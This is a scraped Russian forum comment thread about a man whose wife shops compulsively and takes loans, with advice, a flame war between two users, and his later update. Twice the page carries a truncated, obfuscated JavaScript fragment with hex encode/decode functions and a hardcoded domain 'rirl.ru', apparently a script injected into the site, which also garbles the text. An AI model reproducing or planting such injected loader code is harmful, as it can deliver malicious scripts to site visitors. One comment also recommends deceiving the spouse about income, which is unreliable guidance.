// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да3 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
19 мая 20:56:55
2016-05-19 20:56:55

Андрей, Видите ли... многие магазины устраивают реальные распродажи несезонной коллекции по низким ценам. Это действительно выгодно , если покупать в не сезон, но! С конкретной целью, чтобы потом носить! А я так поняла, у Вашей жены итак чересчур много обуви, и конечно же, эта покупка, скорее всего, совершена так же, не обдуманно ею. Судя по тому, как Вы говорите - коробки, коробки, коробки.. Однозначно, Вам надо вместе с женой решать этот вопрос, попробуйте подключить как пример истории семей, когда они оказывались из-за кредитов в полном банкроте , Можете даже пойти на хитрость: Скажите, что в этом месяце получили оочень маленькую з/п и пожалуйтесь: блин, а как же жить дальше. Просто она на Вас, естественно, привыкла надеяться, что в случае чего Вы заплатите за очередной кредит. Либо и правда сходите к психологу вместе, пусть ей специалист объяснит, что это неразумные действия.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
19 мая 21:02:58
2016-05-19 21:02:58

Сиреневая Кошка, Знаешь что?Ты на себя лучше взгляни, прежде, чем мне тыкать!Для меня уже все в прошлом!Ты ошибок не совершала?Ты в историях никого не осуждаешь?А почему мне нельзя?Ты как и я делала ошибки в прошлом, но это тебе не мешает осуждать других. И писать свои комменты. Я живу в свободной стране и затыкать рот мне не надо!Ходите простите как банда и накидываетесь толпой. Что за привычка такая?

Я долго вас так терпела. Но теперь буду давать отпор. Я никого из вас не трогаю!Вот и вы меня не трогайте!И прекращайте разводить в историях невесть что!Истории не обо мне и не о вас. Хочешь что то написать-напиши мне в личку. Я с тобой пообщаюсь!

Все!Тема моего обсуждения комментариев моих закрыта для меня!Дальнейшие попытки будут мной пресекатся в том же роде что и вы будете писать мне!

Вы сами на себя посмотрите как часто вы пишите слова что в истории не верите и про то что выдумки. Не мешало бы вам тоже поискать бревна в своих глазах прежде чем тыкать мне!

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
19 мая 21:07:11
2016-05-19 21:07:11

Неалина, воу воу воу. Палехче. Что за истерика? Я тебе рот не затыкаю и ты мне даже не пытайся. Я буду писать то, что хочу, и кому хочу.

Ответить
Поддерживаю Да2 / Нет1
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
19 мая 21:14:02
2016-05-19 21:14:02

Сиреневая Кошка, Да что ты!У меня не истерика!Я молчать не буду!И клевать себя не дам!Тоже мне нашли тут козу отпущения!На себя посмотри со стороны!Если ты такая счастливая как пишешь. То с какой стати кидатся тебе на других?Счастливым людям просто этого не надо!Видимо не так уж все и хорошо у тебя!

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
19 мая 21:16:10
2016-05-19 21:16:10

Сиреневая Кошка, А чего ты ожидала?Что можно мне писать все что захочется?А я такая буду сидеть и глотать. Ага!Сейчас!

Ответить
Поддерживаю Да3 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
мисс мира
мисс мира

19 мая 22:52:42
2016-05-19 22:52:42
а можно споры свои в другом месте развивать? а то флуд не по теме. Автора не уважаете вообще. кто-то пусть будет умнее и прекратит это ТУТ
Ответить
Поддерживаю Да1 / Нет0
Ptaxa
Ptaxa

19 мая 23:22:46
2016-05-19 23:22:46
БесШаБаШнЫй ЭлЬф )), 0-0
Ответить
Поддерживаю Да0 / Нет0
Kelebek
21159 Kelebek
Kelebek offline
Репутация : 25403
Комментариев 144 0
20 мая 00:03:27
2016-05-20 00:03:27

Ну вот, пользователи уже ссорятся{#} Хочется услышать автора истории, который прочитал много советов. Андрей, что вы предприняли?

Ответить
Поддерживаю Да2 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2465 8
20 мая 02:32:59
2016-05-20 02:32:59

Андрей, Миленький, для меня ты ее писал, раз я ее читаю на этом ресурсе. Ты ее писал для всех, кто ее читает и кто считает нужным написать то, что считает нужным, а так же и высказать свое мнение и недоверие в том числе. Ясно?

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Андрей
Андрей

20 мая 15:42:19
2016-05-20 15:42:19
Всем привет. Поговорил с Женой своей. Расплакалась сначала. Я сказал что люблю и помогу ей если захочет . Свои вещи она реально считает нужными покупками. Спасибо людям с советами. Беседу провел. В общем мы с ней договорились что на этой неделе она ничего покупать не будет. пообещала. денег у нее в кошельке нету. Я не даю. объяснил почему. она не против. что дальше будет отпишусь. Смотрели с ней по видео про шопоголиков. смешно со стороны. пока так. отпишусь спасибо тем кто не язвил мне. еще мне не понравилось что какого то Артура мне здесь приписывали. Я такого вобще не знаю. В нашей семье нет человека по имени Артур. Меня зовут Андрей 30 лет. Жена младше. если кому-то интересно
Ответить
Поддерживаю Да3 / Нет0
Xelen
21144 Xelen
Xelen offline
Репутация : 36166
Комментариев 436 1
20 мая 16:06:47
2016-05-20 16:06:47

Андрей, надеюсь всё у вас получится. Но будьте начеку, у нее будут срывы! И наблюдайте, не брала ли кредит! Сами знаете, насколько они доступны.

Ответить
Поддерживаю Да2 / Нет0
Kelebek
21159 Kelebek
Kelebek offline
Репутация : 25403
Комментариев 144 0
20 мая 18:42:03
2016-05-20 18:42:03

Андрей, посмотрите с ней фильм "Шопоголик", может узнает себя:))))

Ответить
Поддерживаю Да2 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке